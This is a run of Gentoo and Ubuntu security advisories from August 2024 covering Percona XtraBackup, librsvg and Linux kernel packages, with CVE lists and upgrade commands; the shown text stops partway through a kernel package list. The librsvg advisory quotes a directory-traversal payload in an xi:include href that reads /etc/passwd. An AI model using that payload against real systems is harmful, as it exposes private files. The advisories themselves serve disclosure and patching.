Gentoo Linux Security Advisory 202408-15 - Multiple vulnerabilities have been discovered in Percona XtraBackup, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 8.0.29.22 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Percona XtraBackup: Multiple Vulnerabilities  
     Date: August 09, 2024  
     Bugs: #849389, #908033  
       ID: 202408-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Percona XtraBackup, the  
worst of which could lead to arbitrary code execution.

Background  
==========

Percona XtraBackup is a complete and open source online backup solution  
for all versions of MySQL.

Affected packages  
=================

Package                        Vulnerable    Unaffected  
-----------------------------  ------------  ------------  
dev-db/percona-xtrabackup      < 8.0.29.22   >= 8.0.29.22  
dev-db/percona-xtrabackup-bin  < 8.0.29.22   Vulnerable!

Description  
===========

Multiple vulnerabilities have been discovered in Percona XtraBackup.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Percona XtraBackup users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-db/percona-xtrabackup-8.0.29.22"

Gentoo has discontinued support for the binary package. Users should  
remove this from their system:

  # emerge --sync  
  # emerge --ask --verbose --depclean "dev-db/percona-xtrabackup-bin"

References  
==========

[ 1 ] CVE-2022-25834  
      https://nvd.nist.gov/vuln/detail/CVE-2022-25834  
[ 2 ] CVE-2022-26944  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26944

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-15

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-15

Gentoo Linux Security Advisory 202408-14 - A vulnerability has been discovered in Librsvg, which can lead to arbitrary file reads. Versions greater than or equal to 2.56.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-14  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Librsvg: Arbitrary File Read  
     Date: August 09, 2024  
     Bugs: #918100  
       ID: 202408-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Librsvg, which can lead to  
arbitrary file reads.

Background  
==========

Librsvg is a library to render SVG files using cairo as a rendering  
engine.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
gnome-base/librsvg  < 2.56.3      >= 2.56.3

Description  
===========

A directory traversal problem in the URL decoder of librsvg could be  
used by local or remote attackers to disclose files (on the local  
filesystem outside of the expected area), as demonstrated by  
href=".?../../../../../../../../../../etc/passwd" in an xi:include  
element.

Impact  
======

Please review the referenced CVE identifier for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Librsvg users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=gnome-base/librsvg-2.56.3"

References  
==========

[ 1 ] CVE-2023-38633  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38633

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-14

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-14

Ubuntu Security Notice 6953-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6953-1August 09, 2024linux-oracle, linux-oracle-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oracle: Linux kernel for Oracle Cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM64 architecture;   - M68K architecture;   - User-Mode Linux (UML);   - x86 architecture;   - Accessibility subsystem;   - Character device driver;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - Buffer Sharing and Synchronization framework;   - FireWire subsystem;   - ARM SCMI message protocol;   - GPU drivers;   - HW tracing;   - InfiniBand drivers;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - Network drivers;   - Pin controllers subsystem;   - S/390 drivers;   - SCSI drivers;   - SoundWire subsystem;   - Greybus lights staging drivers;   - TTY drivers;   - Framebuffer layer;   - Virtio drivers;   - 9P distributed file system;   - eCrypt file system;   - EROFS file system;   - Ext4 file system;   - F2FS file system;   - JFFS2 file system;   - Network file system client;   - NILFS2 file system;   - SMB network file system;   - Mellanox drivers;   - Kernel debugger infrastructure;   - IRQ subsystem;   - Tracing infrastructure;   - Dynamic debug library;   - 9P file system network protocol;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - TIPC protocol;   - TLS protocol;   - Unix domain sockets;   - Wireless networking;   - eXpress Data Path;   - XFRM subsystem;   - ALSA framework;(CVE-2024-26584, CVE-2023-52434, CVE-2024-36933, CVE-2024-36286,CVE-2024-36886, CVE-2024-38579, CVE-2022-48772, CVE-2024-39493,CVE-2024-38637, CVE-2024-36016, CVE-2023-52752, CVE-2024-38558,CVE-2024-39488, CVE-2024-38559, CVE-2024-36919, CVE-2024-36905,CVE-2024-39489, CVE-2024-39475, CVE-2021-47131, CVE-2024-26585,CVE-2024-38578, CVE-2024-38567, CVE-2024-38596, CVE-2024-38598,CVE-2024-36940, CVE-2024-38552, CVE-2024-37356, CVE-2024-38780,CVE-2024-38589, CVE-2024-36959, CVE-2024-27399, CVE-2024-36017,CVE-2024-38661, CVE-2024-36939, CVE-2024-36904, CVE-2024-36902,CVE-2024-38381, CVE-2024-36883, CVE-2024-37353, CVE-2024-38560,CVE-2024-39292, CVE-2024-36934, CVE-2024-38621, CVE-2024-38599,CVE-2024-36941, CVE-2022-48655, CVE-2024-26886, CVE-2024-36014,CVE-2024-38613, CVE-2024-27398, CVE-2024-27019, CVE-2024-36954,CVE-2024-39471, CVE-2024-26583, CVE-2024-35947, CVE-2024-31076,CVE-2024-38659, CVE-2024-38549, CVE-2024-38618, CVE-2024-38565,CVE-2024-27401, CVE-2022-48674, CVE-2024-38582, CVE-2024-38634,CVE-2024-38627, CVE-2024-39480, CVE-2024-36015, CVE-2023-52585,CVE-2024-36270, CVE-2024-26907, CVE-2024-38615, CVE-2024-38600,CVE-2024-38612, CVE-2024-36946, CVE-2024-39301, CVE-2024-38601,CVE-2024-38635, CVE-2024-33621, CVE-2024-36964, CVE-2024-38633,CVE-2024-39467, CVE-2024-38607, CVE-2024-36971, CVE-2024-35976,CVE-2024-38587, CVE-2023-52882, CVE-2024-36950, CVE-2024-39276,CVE-2024-36960, CVE-2024-38583)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   linux-image-5.4.0-1129-oracle   5.4.0-1129.138   linux-image-oracle-lts-20.04    5.4.0.1129.122Ubuntu 18.04 LTS   linux-image-5.4.0-1129-oracle   5.4.0-1129.138~18.04.1                                   Available with Ubuntu Pro   linux-image-oracle              5.4.0.1129.138~18.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6953-1   CVE-2021-47131, CVE-2022-48655, CVE-2022-48674, CVE-2022-48772,   CVE-2023-52434, CVE-2023-52585, CVE-2023-52752, CVE-2023-52882,   CVE-2024-26583, CVE-2024-26584, CVE-2024-26585, CVE-2024-26886,   CVE-2024-26907, CVE-2024-27019, CVE-2024-27398, CVE-2024-27399,   CVE-2024-27401, CVE-2024-31076, CVE-2024-33621, CVE-2024-35947,   CVE-2024-35976, CVE-2024-36014, CVE-2024-36015, CVE-2024-36016,   CVE-2024-36017, CVE-2024-36270, CVE-2024-36286, CVE-2024-36883,   CVE-2024-36886, CVE-2024-36902, CVE-2024-36904, CVE-2024-36905,   CVE-2024-36919, CVE-2024-36933, CVE-2024-36934, CVE-2024-36939,   CVE-2024-36940, CVE-2024-36941, CVE-2024-36946, CVE-2024-36950,   CVE-2024-36954, CVE-2024-36959, CVE-2024-36960, CVE-2024-36964,   CVE-2024-36971, CVE-2024-37353, CVE-2024-37356, CVE-2024-38381,   CVE-2024-38549, CVE-2024-38552, CVE-2024-38558, CVE-2024-38559,   CVE-2024-38560, CVE-2024-38565, CVE-2024-38567, CVE-2024-38578,   CVE-2024-38579, CVE-2024-38582, CVE-2024-38583, CVE-2024-38587,   CVE-2024-38589, CVE-2024-38596, CVE-2024-38598, CVE-2024-38599,   CVE-2024-38600, CVE-2024-38601, CVE-2024-38607, CVE-2024-38612,   CVE-2024-38613, CVE-2024-38615, CVE-2024-38618, CVE-2024-38621,   CVE-2024-38627, CVE-2024-38633, CVE-2024-38634, CVE-2024-38635,   CVE-2024-38637, CVE-2024-38659, CVE-2024-38661, CVE-2024-38780,   CVE-2024-39276, CVE-2024-39292, CVE-2024-39301, CVE-2024-39467,   CVE-2024-39471, CVE-2024-39475, CVE-2024-39480, CVE-2024-39488,   CVE-2024-39489, CVE-2024-39493Package Information:   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1129.138

Ubuntu Security Notice USN-6953-1

Ubuntu Security Notice 6952-1 - Benedict Schlüter, Supraja Sridhara, Andrin Bertschi, and Shweta Shinde discovered that an untrusted hypervisor could inject malicious #VC interrupts and compromise the security guarantees of AMD SEV-SNP. This flaw is known as WeSee. A local attacker in control of the hypervisor could use this to expose sensitive information or possibly execute arbitrary code in the trusted execution environment. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6952-1August 09, 2024linux-nvidia-lowlatency, linux-oracle vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-nvidia-lowlatency: Linux low latency kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systemsDetails:Benedict Schlüter, Supraja Sridhara, Andrin Bertschi, and Shweta Shindediscovered that an untrusted hypervisor could inject malicious #VCinterrupts and compromise the security guarantees of AMD SEV-SNP. This flawis known as WeSee. A local attacker in control of the hypervisor could usethis to expose sensitive information or possibly execute arbitrary code inthe trusted execution environment. (CVE-2024-25742)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - M68K architecture;   - OpenRISC architecture;   - PowerPC architecture;   - RISC-V architecture;   - x86 architecture;   - Block layer subsystem;   - Accessibility subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - DMA engine subsystem;   - DPLL subsystem;   - FireWire subsystem;   - EFI core;   - Qualcomm firmware drivers;   - GPIO subsystem;   - GPU drivers;   - HID subsystem;   - Microsoft Hyper-V drivers;   - I2C subsystem;   - InfiniBand drivers;   - IOMMU subsystem;   - IRQ chip drivers;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - EEPROM drivers;   - MMC subsystem;   - Network drivers;   - STMicroelectronics network drivers;   - Device tree and open firmware driver;   - HiSilicon SoC PMU drivers;   - PHY drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - SPI subsystem;   - Media staging drivers;   - Thermal drivers;   - TTY drivers;   - Userspace I/O drivers;   - USB subsystem;   - DesignWare USB3 driver;   - ACRN Hypervisor Service Module driver;   - Virtio drivers;   - 9P distributed file system;   - BTRFS file system;   - eCrypt file system;   - EROFS file system;   - File systems infrastructure;   - GFS2 file system;   - JFFS2 file system;   - Network file systems library;   - Network file system client;   - Network file system server daemon;   - NILFS2 file system;   - Proc file system;   - SMB network file system;   - Tracing file system;   - Mellanox drivers;   - Memory management;   - Socket messages infrastructure;   - Slab allocator;   - Tracing infrastructure;   - User-space API (UAPI);   - Core kernel;   - BPF subsystem;   - DMA mapping infrastructure;   - RCU subsystem;   - Dynamic debug library;   - KUnit library;   - Maple Tree data structure library;   - Heterogeneous memory management;   - Amateur Radio drivers;   - Bluetooth subsystem;   - Ethernet bridge;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - SMC sockets;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;   - Kirkwood ASoC drivers;   - MediaTek ASoC drivers;(CVE-2024-38601, CVE-2024-36935, CVE-2024-35991, CVE-2024-36032,CVE-2024-35988, CVE-2024-36886, CVE-2024-36913, CVE-2024-36928,CVE-2024-38553, CVE-2024-36927, CVE-2024-38615, CVE-2024-36958,CVE-2024-36977, CVE-2024-36889, CVE-2024-38554, CVE-2024-38590,CVE-2024-42134, CVE-2024-35857, CVE-2024-35850, CVE-2024-35986,CVE-2024-36921, CVE-2024-38569, CVE-2024-36966, CVE-2024-38542,CVE-2024-38585, CVE-2024-36884, CVE-2024-36006, CVE-2024-38577,CVE-2024-36016, CVE-2024-38584, CVE-2024-36887, CVE-2024-38598,CVE-2024-35994, CVE-2024-38603, CVE-2024-35998, CVE-2024-27401,CVE-2024-35852, CVE-2024-36944, CVE-2024-38572, CVE-2024-36917,CVE-2024-36943, CVE-2024-36009, CVE-2024-38587, CVE-2024-35949,CVE-2024-36945, CVE-2024-36004, CVE-2024-36919, CVE-2024-27398,CVE-2024-38582, CVE-2024-35847, CVE-2024-38580, CVE-2024-38602,CVE-2024-36916, CVE-2024-36903, CVE-2024-38555, CVE-2024-36952,CVE-2024-38589, CVE-2024-27394, CVE-2024-36933, CVE-2024-36975,CVE-2024-38591, CVE-2024-38612, CVE-2024-36939, CVE-2024-35983,CVE-2024-38607, CVE-2024-36929, CVE-2024-35849, CVE-2024-36941,CVE-2024-35858, CVE-2024-38599, CVE-2024-35996, CVE-2024-36031,CVE-2024-36931, CVE-2024-35990, CVE-2024-35851, CVE-2024-38556,CVE-2024-36000, CVE-2024-36910, CVE-2024-38573, CVE-2024-36906,CVE-2024-36951, CVE-2024-38604, CVE-2024-38613, CVE-2024-38547,CVE-2024-36014, CVE-2024-36949, CVE-2024-36033, CVE-2024-38597,CVE-2024-36880, CVE-2024-38594, CVE-2024-36894, CVE-2024-38546,CVE-2024-36947, CVE-2024-38541, CVE-2024-35989, CVE-2024-27399,CVE-2024-38550, CVE-2024-36922, CVE-2024-36008, CVE-2024-38540,CVE-2024-36924, CVE-2024-36892, CVE-2024-38549, CVE-2024-36882,CVE-2024-36908, CVE-2024-38566, CVE-2024-36005, CVE-2024-38583,CVE-2024-36968, CVE-2024-36017, CVE-2024-38565, CVE-2024-36881,CVE-2024-38611, CVE-2024-36897, CVE-2024-38560, CVE-2024-36923,CVE-2024-38575, CVE-2024-36899, CVE-2024-38570, CVE-2024-36898,CVE-2024-36896, CVE-2024-38559, CVE-2024-38588, CVE-2024-38606,CVE-2024-38551, CVE-2024-36891, CVE-2024-38567, CVE-2024-36895,CVE-2024-35993, CVE-2024-38552, CVE-2024-36925, CVE-2024-36964,CVE-2024-36888, CVE-2024-36956, CVE-2024-36946, CVE-2024-38600,CVE-2024-35997, CVE-2024-36912, CVE-2024-35984, CVE-2024-35848,CVE-2024-38545, CVE-2024-38563, CVE-2024-36918, CVE-2024-36001,CVE-2024-36957, CVE-2024-38576, CVE-2024-36030, CVE-2024-38574,CVE-2024-36963, CVE-2024-36890, CVE-2024-36960, CVE-2024-36901,CVE-2024-38614, CVE-2024-35859, CVE-2024-38593, CVE-2024-36904,CVE-2024-36012, CVE-2024-38578, CVE-2024-36011, CVE-2024-36930,CVE-2024-36938, CVE-2024-36893, CVE-2024-35987, CVE-2024-36905,CVE-2024-35853, CVE-2024-36003, CVE-2024-38562, CVE-2024-38617,CVE-2024-35855, CVE-2024-36965, CVE-2024-38596, CVE-2024-38558,CVE-2024-38568, CVE-2024-36955, CVE-2024-36029, CVE-2024-36967,CVE-2024-36940, CVE-2024-38595, CVE-2024-36028, CVE-2024-38610,CVE-2024-36911, CVE-2024-35999, CVE-2024-35854, CVE-2024-38571,CVE-2024-38548, CVE-2024-36948, CVE-2024-36002, CVE-2024-36961,CVE-2024-36900, CVE-2024-36932, CVE-2024-36902, CVE-2024-35992,CVE-2024-36914, CVE-2024-38592, CVE-2024-38616, CVE-2024-27400,CVE-2024-36937, CVE-2024-36920, CVE-2024-38586, CVE-2024-36909,CVE-2024-35846, CVE-2024-39482, CVE-2024-38579, CVE-2024-38539,CVE-2024-27395, CVE-2024-36962, CVE-2024-36013, CVE-2024-27396,CVE-2024-38557, CVE-2024-36953, CVE-2024-41011, CVE-2023-52882,CVE-2024-36969, CVE-2024-36007, CVE-2024-35856, CVE-2024-38605,CVE-2024-36915, CVE-2024-36979, CVE-2024-36954, CVE-2024-38538,CVE-2024-36950, CVE-2024-36926, CVE-2024-38544, CVE-2024-36959,CVE-2024-38561, CVE-2024-36883, CVE-2024-36936, CVE-2024-38564,CVE-2024-38543, CVE-2024-36934, CVE-2024-35947, CVE-2024-38620)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   linux-image-6.8.0-1010-oracle   6.8.0-1010.10   linux-image-6.8.0-1010-oracle-64k  6.8.0-1010.10   linux-image-6.8.0-1011-nvidia-lowlatency  6.8.0-1011.11.1   linux-image-6.8.0-1011-nvidia-lowlatency-64k  6.8.0-1011.11.1   linux-image-nvidia-lowlatency   6.8.0-1011.11.1   linux-image-nvidia-lowlatency-64k  6.8.0-1011.11.1   linux-image-oracle              6.8.0-1010.10   linux-image-oracle-64k          6.8.0-1010.10After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6952-1   CVE-2023-52882, CVE-2024-25742, CVE-2024-27394, CVE-2024-27395,   CVE-2024-27396, CVE-2024-27398, CVE-2024-27399, CVE-2024-27400,   CVE-2024-27401, CVE-2024-35846, CVE-2024-35847, CVE-2024-35848,   CVE-2024-35849, CVE-2024-35850, CVE-2024-35851, CVE-2024-35852,   CVE-2024-35853, CVE-2024-35854, CVE-2024-35855, CVE-2024-35856,   CVE-2024-35857, CVE-2024-35858, CVE-2024-35859, CVE-2024-35947,   CVE-2024-35949, CVE-2024-35983, CVE-2024-35984, CVE-2024-35986,   CVE-2024-35987, CVE-2024-35988, CVE-2024-35989, CVE-2024-35990,   CVE-2024-35991, CVE-2024-35992, CVE-2024-35993, CVE-2024-35994,   CVE-2024-35996, CVE-2024-35997, CVE-2024-35998, CVE-2024-35999,   CVE-2024-36000, CVE-2024-36001, CVE-2024-36002, CVE-2024-36003,   CVE-2024-36004, CVE-2024-36005, CVE-2024-36006, CVE-2024-36007,   CVE-2024-36008, CVE-2024-36009, CVE-2024-36011, CVE-2024-36012,   CVE-2024-36013, CVE-2024-36014, CVE-2024-36016, CVE-2024-36017,   CVE-2024-36028, CVE-2024-36029, CVE-2024-36030, CVE-2024-36031,   CVE-2024-36032, CVE-2024-36033, CVE-2024-36880, CVE-2024-36881,   CVE-2024-36882, CVE-2024-36883, CVE-2024-36884, CVE-2024-36886,   CVE-2024-36887, CVE-2024-36888, CVE-2024-36889, CVE-2024-36890,   CVE-2024-36891, CVE-2024-36892, CVE-2024-36893, CVE-2024-36894,   CVE-2024-36895, CVE-2024-36896, CVE-2024-36897, CVE-2024-36898,   CVE-2024-36899, CVE-2024-36900, CVE-2024-36901, CVE-2024-36902,   CVE-2024-36903, CVE-2024-36904, CVE-2024-36905, CVE-2024-36906,   CVE-2024-36908, CVE-2024-36909, CVE-2024-36910, CVE-2024-36911,   CVE-2024-36912, CVE-2024-36913, CVE-2024-36914, CVE-2024-36915,   CVE-2024-36916, CVE-2024-36917, CVE-2024-36918, CVE-2024-36919,   CVE-2024-36920, CVE-2024-36921, CVE-2024-36922, CVE-2024-36923,   CVE-2024-36924, CVE-2024-36925, CVE-2024-36926, CVE-2024-36927,   CVE-2024-36928, CVE-2024-36929, CVE-2024-36930, CVE-2024-36931,   CVE-2024-36932, CVE-2024-36933, CVE-2024-36934, CVE-2024-36935,   CVE-2024-36936, CVE-2024-36937, CVE-2024-36938, CVE-2024-36939,   CVE-2024-36940, CVE-2024-36941, CVE-2024-36943, CVE-2024-36944,   CVE-2024-36945, CVE-2024-36946, CVE-2024-36947, CVE-2024-36948,   CVE-2024-36949, CVE-2024-36950, CVE-2024-36951, CVE-2024-36952,   CVE-2024-36953, CVE-2024-36954, CVE-2024-36955, CVE-2024-36956,   CVE-2024-36957, CVE-2024-36958, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36961, CVE-2024-36962, CVE-2024-36963, CVE-2024-36964,   CVE-2024-36965, CVE-2024-36966, CVE-2024-36967, CVE-2024-36968,   CVE-2024-36969, CVE-2024-36975, CVE-2024-36977, CVE-2024-36979,   CVE-2024-38538, CVE-2024-38539, CVE-2024-38540, CVE-2024-38541,   CVE-2024-38542, CVE-2024-38543, CVE-2024-38544, CVE-2024-38545,   CVE-2024-38546, CVE-2024-38547, CVE-2024-38548, CVE-2024-38549,   CVE-2024-38550, CVE-2024-38551, CVE-2024-38552, CVE-2024-38553,   CVE-2024-38554, CVE-2024-38555, CVE-2024-38556, CVE-2024-38557,   CVE-2024-38558, CVE-2024-38559, CVE-2024-38560, CVE-2024-38561,   CVE-2024-38562, CVE-2024-38563, CVE-2024-38564, CVE-2024-38565,   CVE-2024-38566, CVE-2024-38567, CVE-2024-38568, CVE-2024-38569,   CVE-2024-38570, CVE-2024-38571, CVE-2024-38572, CVE-2024-38573,   CVE-2024-38574, CVE-2024-38575, CVE-2024-38576, CVE-2024-38577,   CVE-2024-38578, CVE-2024-38579, CVE-2024-38580, CVE-2024-38582,   CVE-2024-38583, CVE-2024-38584, CVE-2024-38585, CVE-2024-38586,   CVE-2024-38587, CVE-2024-38588, CVE-2024-38589, CVE-2024-38590,   CVE-2024-38591, CVE-2024-38592, CVE-2024-38593, CVE-2024-38594,   CVE-2024-38595, CVE-2024-38596, CVE-2024-38597, CVE-2024-38598,   CVE-2024-38599, CVE-2024-38600, CVE-2024-38601, CVE-2024-38602,   CVE-2024-38603, CVE-2024-38604, CVE-2024-38605, CVE-2024-38606,   CVE-2024-38607, CVE-2024-38610, CVE-2024-38611, CVE-2024-38612,   CVE-2024-38613, CVE-2024-38614, CVE-2024-38615, CVE-2024-38616,   CVE-2024-38617, CVE-2024-38620, CVE-2024-39482, CVE-2024-41011,   CVE-2024-42134Package Information:   https://launchpad.net/ubuntu/+source/linux-nvidia-lowlatency/6.8.0-1011.11.1   https://launchpad.net/ubuntu/+source/linux-oracle/6.8.0-1010.10

Ubuntu Security Notice USN-6952-1

Ubuntu Security Notice 6951-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6951-1August 08, 2024linux, linux-aws, linux-aws-5.4, linux-gcp, linux-gcp-5.4, linux-gkeop,linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm,linux-raspi, linux-xilinx-zynqmp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-iot: Linux kernel for IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-raspi: Linux kernel for Raspberry Pi systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM64 architecture;   - M68K architecture;   - User-Mode Linux (UML);   - x86 architecture;   - Accessibility subsystem;   - Character device driver;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - Buffer Sharing and Synchronization framework;   - FireWire subsystem;   - GPU drivers;   - HW tracing;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - Network drivers;   - Pin controllers subsystem;   - S/390 drivers;   - SCSI drivers;   - SoundWire subsystem;   - Greybus lights staging drivers;   - TTY drivers;   - Framebuffer layer;   - Virtio drivers;   - 9P distributed file system;   - eCrypt file system;   - EROFS file system;   - Ext4 file system;   - F2FS file system;   - JFFS2 file system;   - Network file system client;   - NILFS2 file system;   - SMB network file system;   - Kernel debugger infrastructure;   - IRQ subsystem;   - Tracing infrastructure;   - Dynamic debug library;   - 9P file system network protocol;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - eXpress Data Path;   - XFRM subsystem;   - ALSA framework;(CVE-2024-36934, CVE-2024-38578, CVE-2024-38600, CVE-2024-27399,CVE-2024-39276, CVE-2024-38596, CVE-2024-36933, CVE-2024-36919,CVE-2024-35976, CVE-2024-37356, CVE-2023-52585, CVE-2024-38558,CVE-2024-38560, CVE-2024-38634, CVE-2024-36959, CVE-2024-38633,CVE-2024-36886, CVE-2024-27398, CVE-2024-39493, CVE-2024-26886,CVE-2024-31076, CVE-2024-38559, CVE-2024-38615, CVE-2024-36971,CVE-2024-38627, CVE-2024-36964, CVE-2024-38780, CVE-2024-37353,CVE-2024-38621, CVE-2024-36883, CVE-2024-39488, CVE-2024-38661,CVE-2024-36939, CVE-2024-38589, CVE-2024-38565, CVE-2024-38381,CVE-2024-35947, CVE-2024-36905, CVE-2022-48772, CVE-2024-36017,CVE-2024-36946, CVE-2024-27401, CVE-2024-38579, CVE-2024-38612,CVE-2024-38598, CVE-2024-38635, CVE-2024-38587, CVE-2024-38567,CVE-2024-38549, CVE-2024-36960, CVE-2023-52752, CVE-2024-27019,CVE-2024-38601, CVE-2024-39489, CVE-2024-39467, CVE-2023-52882,CVE-2024-38583, CVE-2024-39480, CVE-2024-38607, CVE-2024-36940,CVE-2024-38659, CVE-2023-52434, CVE-2024-36015, CVE-2024-38582,CVE-2024-36950, CVE-2024-38552, CVE-2024-33621, CVE-2024-36954,CVE-2024-39475, CVE-2024-39301, CVE-2024-38599, CVE-2024-36902,CVE-2024-36286, CVE-2024-38613, CVE-2024-38637, CVE-2024-36941,CVE-2024-36014, CVE-2024-38618, CVE-2024-36904, CVE-2024-36270,CVE-2024-39292, CVE-2024-39471, CVE-2022-48674)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   linux-image-5.4.0-1042-iot      5.4.0-1042.43   linux-image-5.4.0-1049-xilinx-zynqmp  5.4.0-1049.53   linux-image-5.4.0-1077-ibm      5.4.0-1077.82   linux-image-5.4.0-1097-gkeop    5.4.0-1097.101   linux-image-5.4.0-1114-raspi    5.4.0-1114.126   linux-image-5.4.0-1118-kvm      5.4.0-1118.125   linux-image-5.4.0-1130-aws      5.4.0-1130.140   linux-image-5.4.0-1134-gcp      5.4.0-1134.143   linux-image-5.4.0-192-generic   5.4.0-192.212   linux-image-5.4.0-192-generic-lpae  5.4.0-192.212   linux-image-5.4.0-192-lowlatency  5.4.0-192.212   linux-image-aws-lts-20.04       5.4.0.1130.127   